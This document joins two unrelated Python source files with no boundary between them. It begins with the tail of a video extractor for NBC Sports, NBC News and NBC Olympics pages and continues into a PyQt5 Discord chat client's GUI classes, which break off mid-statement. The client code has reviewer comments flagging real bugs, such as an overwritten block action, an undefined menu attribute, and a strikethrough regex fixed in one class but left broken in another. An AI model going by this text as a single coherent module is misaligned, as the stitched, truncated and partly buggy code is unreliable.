'http://www.nbcsports.com//college-basketball/ncaab/tom-izzo-michigan-st-has-so-much-respect-duke', 'info_dict': { 'id': 'PHJSaFWbrTY9', 'ext': 'flv', 'title': 'Tom Izzo, Michigan St. has \'so much respect\' for Duke', 'description': 'md5:ecb459c9d59e0766ac9c7d5d0eda8113', 'uploader': 'NBCU-SPORTS', 'upload_date': '20150330', 'timestamp': 1427726529, } } def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) return self.url_result( NBCSportsVPlayerIE._extract_url(webpage), 'NBCSportsVPlayer') class CSNNEIE(InfoExtractor): _VALID_URL = r'https?://www\.csnne\.com/video/(?P<id>[0-9a-z-]+)' _TEST = { 'url': 'http://www.csnne.com/video/snc-evening-update-wright-named-red-sox-no-5-starter', 'info_dict': { 'id': 'yvBLLUgQ8WU0', 'ext': 'mp4', 'title': 'SNC evening update: Wright named Red Sox\' No. 5 starter.', 'description': 'md5:1753cfee40d9352b19b4c9b3e589b9e3', 'timestamp': 1459369979, 'upload_date': '20160330', 'uploader': 'NBCU-SPORTS', } } def _real_extract(self, url): display_id = self._match_id(url) webpage = self._download_webpage(url, display_id) return { '_type': 'url_transparent', 'ie_key': 'ThePlatform', 'url': self._html_search_meta('twitter:player:stream', webpage), 'display_id': display_id, } class NBCNewsIE(ThePlatformIE): _VALID_URL = r'''(?x)https?://(?:www\.)?(?:nbcnews|today|msnbc)\.com/ (?:video/.+?/(?P<id>\d+)| ([^/]+/)*(?:.*-)?(?P<mpx_id>[^/?]+)) ''' _TESTS = [ { 'url': 'http://www.nbcnews.com/video/nbc-news/52753292', 'md5': '47abaac93c6eaf9ad37ee6c4463a5179', 'info_dict': { 'id': '52753292', 'ext': 'flv', 'title': 'Crew emerges after four-month Mars food study', 'description': 'md5:24e632ffac72b35f8b67a12d1b6ddfc1', }, }, { 'url': 'http://www.nbcnews.com/watch/nbcnews-com/how-twitter-reacted-to-the-snowden-interview-269389891880', 'md5': 'af1adfa51312291a017720403826bb64', 'info_dict': { 'id': '269389891880', 'ext': 'mp4', 'title': 'How Twitter Reacted To The Snowden Interview', 'description':
'md5:65a0bd5d76fe114f3c2727aa3a81fe64', 'uploader': 'NBCU-NEWS', 'timestamp': 1401363060, 'upload_date': '20140529', }, }, { 'url': 'http://www.nbcnews.com/feature/dateline-full-episodes/full-episode-family-business-n285156', 'md5': 'fdbf39ab73a72df5896b6234ff98518a', 'info_dict': { 'id': '529953347624', 'ext': 'mp4', 'title': 'FULL EPISODE: Family Business', 'description': 'md5:757988edbaae9d7be1d585eb5d55cc04', }, 'skip': 'This page is unavailable.', }, { 'url': 'http://www.nbcnews.com/nightly-news/video/nightly-news-with-brian-williams-full-broadcast-february-4-394064451844', 'md5': '73135a2e0ef819107bbb55a5a9b2a802', 'info_dict': { 'id': '394064451844', 'ext': 'mp4', 'title': 'Nightly News with Brian Williams Full Broadcast (February 4)', 'description': 'md5:1c10c1eccbe84a26e5debb4381e2d3c5', 'timestamp': 1423104900, 'uploader': 'NBCU-NEWS', 'upload_date': '20150205', }, }, { 'url': 'http://www.nbcnews.com/business/autos/volkswagen-11-million-vehicles-could-have-suspect-software-emissions-scandal-n431456', 'md5': 'a49e173825e5fcd15c13fc297fced39d', 'info_dict': { 'id': '529953347624', 'ext': 'mp4', 'title': 'Volkswagen U.S.
Chief:\xa0 We Have Totally Screwed Up', 'description': 'md5:c8be487b2d80ff0594c005add88d8351', 'upload_date': '20150922', 'timestamp': 1442917800, 'uploader': 'NBCU-NEWS', }, }, { 'url': 'http://www.today.com/video/see-the-aurora-borealis-from-space-in-stunning-new-nasa-video-669831235788', 'md5': '118d7ca3f0bea6534f119c68ef539f71', 'info_dict': { 'id': '669831235788', 'ext': 'mp4', 'title': 'See the aurora borealis from space in stunning new NASA video', 'description': 'md5:74752b7358afb99939c5f8bb2d1d04b1', 'upload_date': '20160420', 'timestamp': 1461152093, 'uploader': 'NBCU-NEWS', }, }, { 'url': 'http://www.msnbc.com/all-in-with-chris-hayes/watch/the-chaotic-gop-immigration-vote-314487875924', 'md5': '6d236bf4f3dddc226633ce6e2c3f814d', 'info_dict': { 'id': '314487875924', 'ext': 'mp4', 'title': 'The chaotic GOP immigration vote', 'description': 'The Republican House votes on a border bill that has no chance of getting through the Senate or signed by the President and is drawing criticism from all sides.', 'thumbnail': 're:^https?://.*\.jpg$', 'timestamp': 1406937606, 'upload_date': '20140802', 'uploader': 'NBCU-NEWS', 'categories': ['MSNBC/Topics/Franchise/Best of last night', 'MSNBC/Topics/General/Congress'], }, }, { 'url': 'http://www.nbcnews.com/watch/dateline/full-episode--deadly-betrayal-386250819952', 'only_matching': True, }, { # From http://www.vulture.com/2016/06/letterman-couldnt-care-less-about-late-night.html 'url': 'http://www.nbcnews.com/widget/video-embed/701714499682', 'only_matching': True, }, ] def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') if video_id is not None: all_info = self._download_xml('http://www.nbcnews.com/id/%s/displaymode/1219' % video_id, video_id) info = all_info.find('video') return { 'id': video_id, 'title': info.find('headline').text, 'ext': 'flv', 'url': find_xpath_attr(info, 'media', 'type', 'flashVideo').text, 'description': info.find('caption').text, 'thumbnail':
find_xpath_attr(info, 'media', 'type', 'thumbnail').text, } else: # "feature" and "nightly-news" pages use theplatform.com video_id = mobj.group('mpx_id') if not video_id.isdigit(): webpage = self._download_webpage(url, video_id) info = None bootstrap_json = self._search_regex( [r'(?m)(?:var\s+(?:bootstrapJson|playlistData)|NEWS\.videoObj)\s*=\s*({.+});?\s*$', r'videoObj\s*:\s*({.+})', r'data-video="([^"]+)"'], webpage, 'bootstrap json', default=None) bootstrap = self._parse_json( bootstrap_json, video_id, transform_source=unescapeHTML) if 'results' in bootstrap: info = bootstrap['results'][0]['video'] elif 'video' in bootstrap: info = bootstrap['video'] else: info = bootstrap video_id = info['mpxId'] return { '_type': 'url_transparent', 'id': video_id, # http://feed.theplatform.com/f/2E2eJC/nbcnews also works 'url': 'http://feed.theplatform.com/f/2E2eJC/nnd_NBCNews?byId=%s' % video_id, 'ie_key': 'ThePlatformFeed', } class NBCOlympicsIE(InfoExtractor): _VALID_URL = r'https?://www\.nbcolympics\.com/video/(?P<id>[a-z-]+)' _TEST = { # Geo-restricted to US 'url': 'http://www.nbcolympics.com/video/justin-roses-son-leo-was-tears-after-his-dad-won-gold', 'md5': '54fecf846d05429fbaa18af557ee523a', 'info_dict': { 'id': 'WjTBzDXx5AUq', 'display_id': 'justin-roses-son-leo-was-tears-after-his-dad-won-gold', 'ext': 'mp4', 'title': 'Rose\'s son Leo was in tears after his dad won gold', 'description': 'Olympic gold medalist Justin Rose gets emotional talking to the impact his win in men\'s golf has already had on his children.', 'timestamp': 1471274964, 'upload_date': '20160815', 'uploader': 'NBCU-SPORTS', }, } def _real_extract(self, url): display_id = self._match_id(url) webpage = self._download_webpage(url, display_id) drupal_settings = self._parse_json(self._search_regex( r'jQuery\.extend\(Drupal\.settings\s*,\s*({.+?})\);', webpage, 'drupal settings'), display_id) iframe_url = drupal_settings['vod']['iframe_url'] theplatform_url = iframe_url.replace(
'vplayer.nbcolympics.com', 'player.theplatform.com') return { '_type': 'url_transparent', 'url': theplatform_url, 'ie_key': ThePlatformIE.ie_key(), 'display_id': display_id, }
#!/usr/bin/env python3 # Copyright (c) 2016-2020, henry232323 # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. 
# Explicit imports: `os` and `re` are used below (sound playback, markdown
# conversion) and must not silently depend on `from formatting import *`
# re-exporting them.
import os
import re
from asyncio import ensure_future
from contextlib import redirect_stdout
from inspect import isawaitable
from io import StringIO, BytesIO
from sys import exit as sysexit
from traceback import format_exc

import discord
import simpleaudio as sa
from PyQt5 import uic
from PyQt5.QtCore import Qt, pyqtSlot, QUrl
from PyQt5.QtGui import QIcon, QTextCursor, QStandardItem, QColor, QBrush, QTextDocument, QImage
from PyQt5.QtWidgets import QDialog, QWidget, QListWidgetItem, QComboBox, QHeaderView, QTableWidgetItem, QAction, QMenu
from async_timeout import timeout

from formatting import *


class PrivateMessageWidget(QWidget):
    def __init__(self, app, parent, user, name):
        """
        The widget within each tab of TabWindow, a display
        for new private messages and user input

        :param app: the running application object
        :param parent: the owning TabWindow
        :param user: the `discord.User`/`discord.DMChannel` this tab talks to
        :param name: display name shown in the tab label
        """
        super(__class__, self).__init__()
        uic.loadUi(app.theme["ui_path"] + "/PrivateMessageWidget.ui", self)
        self.user = user
        self.app = app
        self.parent = parent
        # setattr(user, "display_name", friend)
        self.userLabel.setText(name.join(["::", "::"]))
        self.sendButton.clicked.connect(self.send)
        self.userOutput.setReadOnly(True)
        self.userOutput.setMouseTracking(True)
        self.userOutput.anchorClicked.connect(self.anchorClicked)
        self.userOutput.setOpenLinks(False)
        if isinstance(user, discord.DMChannel):
            self.display_text(fmt_begin_msg(app, self.app.client.user, user.recipient))
        ensure_future(self.get_logs())

    @pyqtSlot(QUrl)
    def anchorClicked(self, url):
        """Dispatch clicks on rich-text pseudo-links (mention=/channel=/role=)."""
        urlstr = url.toString()
        if urlstr.startswith("mention="):
            id = urlstr[8:]
            user = discord.utils.get(self.app.client.get_all_members(), id=int(id))
            if user.id != self.app.client.user.id:
                self.app.gui.start_privmsg(user)
        elif urlstr.startswith("channel="):
            # NOTE(review): PrivateMessageWidget never sets `self.memo`; this
            # branch looks copied from MemoMessageWidget and would raise
            # AttributeError if a channel link is ever clicked in a PM — confirm.
            id = urlstr[8:]
            channel = discord.utils.get(self.memo.guild.channels, id=int(id))
            if channel.id != self.memo.id:
                self.parent.tabWidget.setCurrentIndex(self.parent.channels.index(channel))
        elif urlstr.startswith("role="):
            pass

    async def get_logs(self):
        """Fetch the last 100 messages of this DM and render them oldest-first."""
        ms = ""
        for message in reversed(await self.user.history(limit=100).flatten()):
            fmt = fmt_disp_msg(self.app, message.content, message, user=message.author)
            ms += fmt
        self.display_text(ms)
        sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "alarm.wav")).play()

    def send(self):
        """Send the user the message in the userInput box, called on enter press / send button press"""
        msg = self.userInput.text()
        if msg:
            self.app.send_msg(msg, self.user)
            self.userInput.setText("")

    def display_text(self, msg):
        '''Insert msg into the display box, converting markdown to HTML.'''
        msg = msg.replace("\n", "<br />")
        msg = re.sub(r'(?<!\\)\*\*(.*?[^\\])\*\*', r"<strong>\1</strong>", msg)
        msg = re.sub(r'(?<!\\)\*(.*?[^\\])\*', r"<i>\1</i>", msg)
        msg = re.sub(r'(?<!\\)```(.*?[^\\])```', r"<code>\1</code>", msg)
        msg = re.sub(r'(?<!\\)`(.*?[^\\])`', r"<code>\1</code>", msg)
        # BUG FIX: the strikethrough pattern previously ended with a stray
        # backtick (r'~~(.*?[^\\])`'), so ~~text~~ was never converted.
        msg = re.sub(r'(?<!\\)~~(.*?[^\\])~~', r"<s>\1</s>", msg)
        cursor = self.userOutput.textCursor()
        cursor.movePosition(QTextCursor.End)
        self.userOutput.setTextCursor(cursor)
        self.userOutput.insertHtml(msg)

    def keyPressEvent(self, event):
        '''Use enter key to send'''
        if event.key() == Qt.Key_Return:
            self.send()


class TabWindow(QWidget):
    def __init__(self, app, parent, user):
        """
        A window for storing PrivateMessageWidget instances, a
        navigation between current private message users
        """
        super(__class__, self).__init__()
        self.parent = parent
        self.app = app
        uic.loadUi(app.theme["ui_path"] + "/TabWindow.ui", self)
        self.users = []
        self.ids = []
        self.init_user = self.add_user(user)
        self.tabWidget.removeTab(0)  # Remove two default tabs
        self.tabWidget.removeTab(0)
        self.tabWidget.setTabsClosable(True)
        self.tabWidget.tabCloseRequested.connect(self.closeTab)
        self.setWindowTitle("Private Message")
        self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png"))
        self.show()

    def closeTab(self, currentIndex):
        """Destroy the tab at currentIndex; close the window when none remain."""
        widget = self.tabWidget.widget(currentIndex)
        widget.deleteLater()
        self.tabWidget.removeTab(currentIndex)
        self.users.remove(widget.user)
        # BUG FIX: self.ids was never pruned, so after closing a tab
        # add_user's `self.ids.index(user.id)` pointed at the wrong tab
        # (or resurrected a deleted widget).
        self.ids.remove(widget.user.id)
        if not self.users:
            self.close()
        sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "cease.wav")).play()

    def closeEvent(self, event):
        event.accept()
        self.app.gui.tabWindow = None

    def add_user(self, user):
        """
        Add a user & PrivateMessageWidget to window, check if it is already there
        if so, return that user's PM, if not, create and return a PM
        On PrivateMessageWidget creation, send a PESTERCHUM:BEGIN initiation message

        :rtype: `PrivateMessageWidget`
        :param user: The `discord.User` to message
        """
        if user.id not in self.ids:
            # Derive a tab label from whichever channel/user type we were given.
            if isinstance(user, discord.User):
                name = user.display_name
            elif isinstance(user, discord.GroupChannel):
                if not user.name:
                    name = ", ".join(map(lambda c: c.display_name, user.recipients))
                else:
                    name = user.name
            else:
                name = user.recipient.display_name
            windw = PrivateMessageWidget(self.app, self, user, name)
            icon = QIcon("resources/pc_chummy.png")
            a = self.tabWidget.addTab(windw, icon, name)
            tab = self.tabWidget.widget(a)
            self.users.append(user)
            self.ids.append(user.id)
            return tab
        else:
            return self.tabWidget.widget(self.ids.index(user.id))


class AddFriendDialog(QDialog):
    def __init__(self, app, parent):
        """
        Dialog opened when the Add [Chum] button is pressed,
        adds to chumsTree widget
        """
        super(__class__, self).__init__()
        self.parent = parent
        self.app = app
        uic.loadUi(self.app.theme["ui_path"] + "/AddFriendDialog.ui", self)
        self.setWindowTitle('Add Chum')
        self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png"))
        self.acceptButton.clicked.connect(self.accepted)
        self.rejectButton.clicked.connect(self.close)
        self.exec_()

    def accepted(self):
        '''Call once accepted, check if name is alphanumeric if not warn and try again'''
        user = self.addChumInput.text()
        if user:
            self.app.add_friend(user)
            self.close()


class AddBlockedDialog(QDialog):
    def __init__(self, app, parent):
        '''
        Dialog opened when the Add button is pressed in TROLLSLUM,
        adds to parent.blockedList widget
        '''
        super(__class__, self).__init__()
        self.parent = parent
        self.app = app
        uic.loadUi(self.app.theme["ui_path"] + "/AddBlockedDialog.ui", self)
        self.setWindowTitle('TROLLSLUM')
        self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png"))
        self.acceptButton.clicked.connect(self.accepted)
        self.rejectButton.clicked.connect(self.close)
        self.exec_()

    def accepted(self):
        '''Call once accepted, check if name is alphanumeric if not warn and try again'''
        user = self.addChumInput.text()
        if user and (user not in self.app.blocked):
            self.app.add_blocked(user)
            item = QListWidgetItem(user)
            self.parent.blockedList.addItem(item)
            # If the blocked user is currently a friend, remove them from the chums tree.
            if user in self.app.friends.keys():
                index = self.app.gui.chumsTree.indexOfTopLevelItem(self.app.gui.getFriendItem(user)[0])
                self.app.gui.chumsTree.takeTopLevelItem(index)
            self.close()
        else:
            self.close()


class BlockedDialog(QDialog):
    """TROLLSLUM dialog: lists blocked users with add/remove controls."""

    def __init__(self, app, parent):
        super(__class__, self).__init__()
        uic.loadUi(app.theme["ui_path"] + "/BlockedDialog.ui", self)
        self.app = app
        self.parent = parent
        self.setWindowTitle('TROLLSLUM')
        self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png"))
        self.addBlockButton.clicked.connect(self.add)
        self.removeBlockButton.clicked.connect(self.remove)
        for user in self.app.blocked:
            self.blockedList.addItem(QListWidgetItem(user))
        self.exec_()

    def add(self):
        # Dialog mutates app state and parent.blockedList itself.
        dialog = AddBlockedDialog(self.app, self)

    def remove(self):
        """Unblock the selected user; restore them to the friends tree if applicable."""
        selected = self.blockedList.selectedItems()
        if selected:
            item = selected[0]
            index = self.blockedList.indexFromItem(item)
            self.blockedList.takeItem(index.row())
            user = item.text()
            self.app.blocked.remove(user)
            if user in self.app.friends.keys():
                treeitem = QStandardItem(user)
                treeitem.setText(user)
                # Re-added friends start with the offline icon until a presence update.
                treeitem.setIcon(QIcon(self.app.theme["path"] + "/offline.png"))
                self.app.gui.friendsModel.appendRow(treeitem)


class OptionsWindow(QWidget):
    """Settings window: mirrors self.app.options into the UI and back on save."""

    def __init__(self, app, parent):
        super(__class__, self).__init__()
        uic.loadUi(app.theme["ui_path"] + "/OptionsWindow.ui", self)
        self.app = app
        self.parent = parent
        self.setWindowTitle('Options')
        self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png"))
        self.options = self.app.options
        width = self.frameGeometry().width()
        height = self.frameGeometry().height()
        self.setFixedSize(width, height)
        self.buttons = (self.optionsButton1, self.optionsButton2,
                        self.optionsButton3, self.optionsButton4,
                        self.optionsButton5, self.optionsButton6,
                        self.optionsButton7, self.optionsButton8)
        # Each sidebar button switches the stacked widget to its page.
        for index, button in enumerate(self.buttons):
            button.clicked.connect(self.make_call(index, button))
        self.acceptButton.clicked.connect(self.saveConfig)
        self.rejectButton.clicked.connect(self.close)
        self.themesComboBox.addItems(self.app.themes.keys())
        self.themesComboBox.setInsertPolicy(QComboBox.InsertAlphabetically)
        index = self.themesComboBox.findText(self.app.theme_name)
        self.themesComboBox.setCurrentIndex(index)
        self.refreshThemeButton.clicked.connect(
            lambda: self.app.change_theme(self.themesComboBox.currentText(), f=True))
        convo_opt = self.options["conversations"]
        chum_opt = self.options["chum_list"]
        interface_opt = self.options["interface"]
        # Chum List
        self.hideOfflineRadio.setChecked(chum_opt["hide_offline_chums"])
        self.showEmptyRadio.setChecked(chum_opt["show_empty_groups"])
        self.showNumberRadio.setChecked(chum_opt["show_number_of_online_chums"])
        self.sortChumsCombo.addItems(("Alphabetically", "Mood"))
        self.sortChumsCombo.setCurrentIndex(chum_opt["sort_chums"])
        self.lowBandwidthRadio.setChecked(chum_opt["low_bandwidth"])
        # Conversations
        self.timeStampsRadio.setChecked(convo_opt["time_stamps"])
        self.showSecondsRadio.setChecked(convo_opt["show_seconds"])
        self.opVoiceMemoRadio.setChecked(convo_opt["op_and_voice_in_memos"])
        self.animatedSmiliesRadio.setChecked(convo_opt["use_animated_smilies"])
        self.randomEncountersRadio.setChecked(convo_opt["receive_random_encounters"])
        self.clockTypeComboBox.addItems(('12', '24'))
        self.clockTypeComboBox.setCurrentIndex(convo_opt["clock_type"])
        # Interface
        self.tabbedConvoBox.setChecked(interface_opt["tabbed_conversations"])
        self.tabbedMemoBox.setChecked(interface_opt["tabbed_memos"])
        self.blinkPesterBox.setChecked(interface_opt["blink_taskbar_on_pesters"])
        self.blinkMemoBox.setChecked(interface_opt["blink_taskbar_on_memos"])
        self.minimizeCombo.addItems(('Minimize to Taskbar', 'Minimize to Tray', 'Quit'))
        self.minimizeCombo.setCurrentIndex(interface_opt["minimize"])
        self.closeCombo.addItems(('Minimize to Taskbar', 'Minimize to Tray', 'Quit'))
        self.closeCombo.setCurrentIndex(interface_opt["close"])
        # Updates
        self.pesterchumUpdatesCheck.setChecked(int(interface_opt["auto_update"]))
        self.show()

    def saveConfig(self):
        """Write every widget's state back into self.options; revert theme on failure."""
        oldtheme = self.app.theme_name
        try:
            # Chum List
            self.options["chum_list"]["hide_offline_chums"] = self.hideOfflineRadio.isChecked()
            self.options["chum_list"]["show_empty_groups"] = self.showEmptyRadio.isChecked()
            self.options["chum_list"]["show_number_of_online_chums"] = self.showNumberRadio.isChecked()
            self.options["chum_list"]["sort_chums"] = self.sortChumsCombo.currentIndex()
            self.options["chum_list"]["low_bandwidth"] = self.lowBandwidthRadio.isChecked()
            # Conversations
            self.options["conversations"]["time_stamps"] = self.timeStampsRadio.isChecked()
            self.options["conversations"]["show_seconds"] = self.showSecondsRadio.isChecked()
            self.options["conversations"]["op_and_voice_in_memos"] = self.opVoiceMemoRadio.isChecked()
            self.options["conversations"]["use_animated_smilies"] = self.animatedSmiliesRadio.isChecked()
            self.options["conversations"]["receive_random_encounters"] = self.randomEncountersRadio.isChecked()
            self.options["conversations"]["clock_type"] = self.clockTypeComboBox.currentIndex()
            # Interface
            self.options["interface"]["tabbed_conversations"] = self.tabbedConvoBox.isChecked()
            self.options["interface"]["tabbed_memos"] = self.tabbedMemoBox.isChecked()
            self.options["interface"]["blink_taskbar_on_pesters"] = self.blinkPesterBox.isChecked()
            self.options["interface"]["blink_taskbar_on_memos"] = self.blinkMemoBox.isChecked()
            self.options["interface"]["minimize"] = self.minimizeCombo.currentIndex()
            self.options["interface"]["close"] = self.closeCombo.currentIndex()
            # Updates
            self.options["interface"]["auto_update"] = self.pesterchumUpdatesCheck.isChecked()
            self.app.change_theme(self.themesComboBox.currentText())
            # Theme
            self.options["theme"]["theme"] = self.themesComboBox.currentText()
        except Exception as e:
            self.errorLabel.setText("Error changing theme: \n{}".format(e))
            self.app.change_theme(oldtheme)
            print(e)
        self.close()

    def make_call(self, index, button):
        # Closure factory: binds (index, button) for each sidebar button's slot.
        def setIndex():
            self.stackedWidget.setCurrentIndex(index)
            button.setChecked(True)
            for Button in self.buttons:
                if button != Button:
                    Button.setChecked(False)
        return setIndex


class MemosWindow(QWidget):
    """Window listing every guild as a joinable 'memo' with its member count."""

    def __init__(self, app, parent):
        super(__class__, self).__init__()
        uic.loadUi(app.theme["ui_path"] + "/MemoWindow.ui", self)
        self.app = app
        self.parent = parent
        self.setWindowTitle('Memos')
        self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png"))
        # width = self.frameGeometry().width()
        # height = self.frameGeometry().height()
        # self.setFixedSize(width, height)
        self.memosTableWidget.setColumnCount(2)
        self.memosTableWidget.setHorizontalHeaderLabels(["Memo", "Users"])
        self.memosTableWidget.doubleClicked.connect(self.openMemo)
        header = self.memosTableWidget.horizontalHeader()
        header.setSectionResizeMode(QHeaderView.Stretch)
        self.ctr = 0          # next free row index in the table
        self.open = dict()    # guild -> MemoTabWindow currently open
        for guild in self.app.client.guilds:
            self.add_channel(guild.name, len(guild.members))
        self.memosTableWidget.sortItems(0)
        self.joinMemoButton.clicked.connect(self.join_button)
        self.show()

    def join_button(self):
        """Open the memo typed in the line edit, or the selected row if empty."""
        try:
            name = self.memoNameLineEdit.text()
            if name:
                items = self.memosTableWidget.findItems(name, Qt.MatchExactly)
                self.openMemo(self.memosTableWidget.indexFromItem(items[0]))
            else:
                selected = self.memosTableWidget.selectedItems()
                if not selected:
                    return
                else:
                    self.openMemo(self.memosTableWidget.indexFromItem(selected[0]))
        # NOTE(review): bare except deliberately swallows bad input (e.g. no
        # match -> IndexError) and just prints — confirm this best-effort
        # behavior is intended.
        except:
            import traceback
            traceback.print_exc()

    def display_message(self, channel, message):
        win = self.getWindow(channel.guild)
        win.display_message(channel, message)

    def getWindow(self, guild):
        # NOTE(review): the str branch returns a discord.Guild, not a window —
        # callers expecting a MemoTabWindow (e.g. display_message) would break
        # on it. Only the Guild branch appears to be exercised; verify.
        if isinstance(guild, discord.Guild):
            return self.open[guild]
        elif isinstance(guild, str):
            return discord.utils.get(self.app.client.guilds, name=guild)
        else:
            return None

    def openMemo(self, index):
        """Open a MemoTabWindow for the guild named in the clicked row."""
        if index.column():
            # Normalize clicks on the Users column back to the Memo column.
            index = index.sibling(index.row(), 0)
        item = self.memosTableWidget.itemFromIndex(index)
        guild = discord.utils.get(self.app.client.guilds, name=item.text())
        tab = MemoTabWindow(self.app, self, guild)
        self.open[guild] = tab
        return tab.memo

    def add_channel(self, memo, usercount):
        """Append one (memo name, user count) row to the table."""
        self.memosTableWidget.insertRow(self.ctr)
        icn = QIcon(self.app.theme["path"] + "/memo.png")
        mitem = QTableWidgetItem(icn, memo)
        mitem.setFlags(Qt.ItemFlags(Qt.ItemIsSelectable) | Qt.ItemFlags(Qt.ItemIsEnabled))
        uitem = QTableWidgetItem()
        uitem.setData(0, usercount)
        uitem.setTextAlignment(2)
        uitem.setFlags(Qt.ItemFlags(Qt.ItemIsSelectable) | Qt.ItemFlags(Qt.ItemIsEnabled))
        self.memosTableWidget.setItem(self.ctr, 0, mitem)
        self.memosTableWidget.setItem(self.ctr, 1, uitem)
        self.ctr += 1

    def closeEvent(self, event):
        event.accept()
        self.app.gui.memosWindow = None


class MemoMessageWidget(QWidget):
    def __init__(self, app, container, parent, memo):
        """
        The widget within each tab of TabWindow, a display
        for new private messages and user input
        """
        super(__class__, self).__init__()
        self.parent = parent
        self.names = []
        uic.loadUi(app.theme["ui_path"] + "/MemoMessageWidget.ui", self)
        self.memo = memo
        self.app = app
        self.container = container
        self.names = self.memo.guild.members
        self.memoUsers.setContextMenuPolicy(Qt.CustomContextMenu)
        self.memoUsers.customContextMenuRequested.connect(self.openMemoMenu)
        self.messageContext = QAction("MESSAGE")
        self.messageContext.triggered.connect(self.message_user)
        self.blockContext = QAction("BLOCK")
        self.blockContext.triggered.connect(self.block_user)
        # NOTE(review): this second assignment OVERWRITES the "BLOCK" action
        # above, and `self.removeBlockContext` (referenced in openMemoMenu) is
        # never created — it was presumably meant to be
        # `self.removeBlockContext = QAction("UNBLOCK")`. Confirm and fix.
        self.blockContext = QAction("UNBLOCK")
        self.blockContext.triggered.connect(self.unblock_user)
        self.friendContext = QAction("ADD FRIEND")
        self.friendContext.triggered.connect(self.send_friend_request)
self.removeContext = QAction("REMOVE FRIEND") self.removeContext.triggered.connect(self.remove_friend) self.userLabel.setText(memo.name.join(["::", "::"])) self.sendButton.clicked.connect(self.send) self.userOutput.setReadOnly(True) self.userOutput.setMouseTracking(True) self.userOutput.anchorClicked.connect(self.anchorClicked) self.userOutput.setOpenLinks(False) self.userOutput.document().setDefaultStyleSheet(self.app.theme["styles"]) self.userOutput.setHtml("<body>\n</body>") if not self.memo.permissions_for(self.memo.guild.me).send_messages: self.userInput.setReadOnly(True) ensure_future(self.load_emojis()) ensure_future(self.get_logs()) async def load_emojis(self): for emoji in self.memo.guild.emojis: with timeout(10): bop = BytesIO() await emoji.url.save(bop) qmg = QImage() qmg.loadFromData(bop.getvalue()) self.userOutput.document().addResource(QTextDocument.ImageResource, QUrl(str(emoji.url)), qmg) @pyqtSlot(QUrl) def anchorClicked(self, url): urlstr = url.toString() if urlstr.startswith("mention="): id = urlstr[8:] user = discord.utils.get(self.app.client.get_all_members(), id=int(id)) if user.id != self.app.client.user.id: self.app.gui.start_privmsg(user) elif urlstr.startswith("channel="): id = urlstr[8:] channel = discord.utils.get(self.memo.guild.channels, id=int(id)) if channel.id != self.memo.id: self.parent.tabWidget.setCurrentIndex(self.parent.channels.index(channel)) elif urlstr.startswith("role="): pass async def get_logs(self): ms = "" for message in reversed(await self.memo.history(limit=100).flatten()): fmt = fmt_disp_msg(self.app, message.content, message, user=message.author) ms += fmt self.display_text(ms) def send(self): """Send the user the message in the userInput box, called on enter press / send button press""" msg = self.userInput.text() if msg.strip(): self.app.send_msg(msg, self.memo) self.userInput.setText("") def display_text(self, msg): '''Insert msg into the display box''' msg = msg.replace("\n", "<br />") msg = 
re.sub(r'(?<!\\)\*\*(.*?[^\\])\*\*', r"<strong>\1</strong>", msg) msg = re.sub(r'(?<!\\)\*(.*?[^\\])\*', r"<i>\1</i>", msg) msg = re.sub(r'(?<!\\)```(.*?[^\\])```', r"<code>\1</code>", msg) msg = re.sub(r'(?<!\\)`(.*?[^\\])`', r"<code>\1</code>", msg) msg = re.sub(r'(?<!\\)~~(.*?[^\\])`', r"<s>\1</s>", msg) cursor = self.userOutput.textCursor() cursor.movePosition(QTextCursor.End) self.userOutput.setTextCursor(cursor) self.userOutput.insertHtml(msg) def keyPressEvent(self, event): '''Use enter key to send''' if event.key() == Qt.Key_Return: self.send() def openMemoMenu(self, position): menu = QMenu() selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if self.app.client.user.bot and member is not self.memo.guild.me: menu.addAction(self.messageContext) elif member is not self.memo.guild.me: menu.addAction(self.messageContext) if member.is_friend(): menu.addAction(self.removeContext) else: menu.addAction(self.friendContext) if member.is_blocked(): menu.addAction(self.removeBlockContext) else: menu.addAction(self.blockContext) else: return menu.exec_(self.memoUsers.viewport().mapToGlobal(position)) def message_user(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(self.app.gui.start_pm(member)) def block_user(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.block()) def unblock_user(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.unblock()) def send_friend_request(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = 
